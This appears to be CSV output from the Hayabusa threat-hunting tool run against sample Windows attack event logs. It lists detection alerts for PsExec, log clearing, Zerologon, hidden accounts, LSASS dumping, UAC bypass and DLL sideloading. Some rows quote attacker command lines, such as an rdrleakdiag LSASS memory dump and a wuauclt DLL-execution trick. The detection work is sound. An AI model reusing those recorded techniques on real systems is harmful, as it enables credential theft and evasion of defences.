2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown  :  Workstation: 04246W-WIN10  :  IP Address: 172.16.66.142  :  Port: 60726  :  LogonID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown  :  Workstation: -  :  IP Address: 172.16.66.142  :  Port: 60728  :  LogonID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown  :  Workstation: -  :  IP Address: 172.16.66.142  :  Port: 60726  :  LogonID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632  :  Path: C:\Windows\System32\WerFault.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420  :  Path: C:\Windows\System32\WerFault.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,Logon Failure - Wrong Password,User: IEUser  :  Type: 2  :  Workstation: MSEDGEWIN10  :  IP Address: -  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx
2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: MSEDGEWIN10  :  IP Address: -  :  Port: -  :  LogonID: 0x1cd8f6  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx
2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: MSEDGEWIN10  :  IP Address: -  :  Port: -  :  LogonID: 0x1cd964  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx
2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx
2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx
2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx
2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,informational,Explicit Logon,Source User: svc01  :  Target User: IEUser  :  IP Address: -  :  Process: C:\Windows\System32\inetsrv\w3wp.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx
2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,System log file was cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx
2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON  :  Workstation: 02694W-WIN10  :  IP Address: 172.16.66.37  :  Port: 49707  :  LogonID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON  :  Workstation: 02694W-WIN10  :  IP Address: 172.16.66.37  :  Port: 49707  :  LogonID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $  :  SID:S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $  :  SID:S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator  :  Workstation 02694W-WIN10  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation: 02694W-WIN10  :  IP Address: 172.16.66.37  :  Port: 49959  :  LogonID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
2020-09-24 01:49:41.578 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6}  :  Path: C:\Windows\System32\dllhost.exe  :  User: 3B\Administrator  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85}  :  Path: C:\Windows\System32\dllhost.exe  :  User: 3B\Administrator  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator  :  Workstation   :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation: -  :  IP Address: 172.16.66.37  :  Port: 50106  :  LogonID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616  :  Path: C:\Windows\System32\WerFault.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator  :  Workstation   :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation: -  :  IP Address: 172.16.66.37  :  Port: 50107  :  LogonID: 0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\wermgr.exe -upload  :  Path: C:\Windows\System32\wermgr.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,"Command: rdrleakdiag.exe  /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap  :  Path: C:\Windows\System32\rdrleakdiag.exe  :  User: DESKTOP-PIU87N6\wanwan  :  Parent Command: ""C:\WINDOWS\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,Command: C:\WINDOWS\system32\lsass.exe  :  Path: C:\Windows\System32\lsass.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\WINDOWS\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,Suspicious LSASS Process Clone,,rules/sigma/process_creation/win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: POC.exe  :  Path: C:\Users\Public\POC\bin\Debug\POC.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: Program  :  Path: C:\Users\Public\POC\bin\Debug\POC.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: POC.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe  :  Path: C:\Windows\System32\Taskmgr.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: Akagi_64.exe  59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe  :  Path: C:\Windows\System32\Taskmgr.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: Akagi_64.exe  59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Windows\System32\mmc.exe"" WF.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx
2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx
2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: wuauclt.exe   /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx
2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: wuauclt.exe   /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx
2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\smartscreen.exe -Embedding  :  Path: C:\Windows\System32\smartscreen.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe""  :  Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Users\Public\tools\apt\tendyron.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe""   :  Path: C:\Users\Public\tools\apt\wwlib\test.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe""   :  Path: C:\Users\Public\tools\apt\wwlib\test.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart  :  Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe""  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
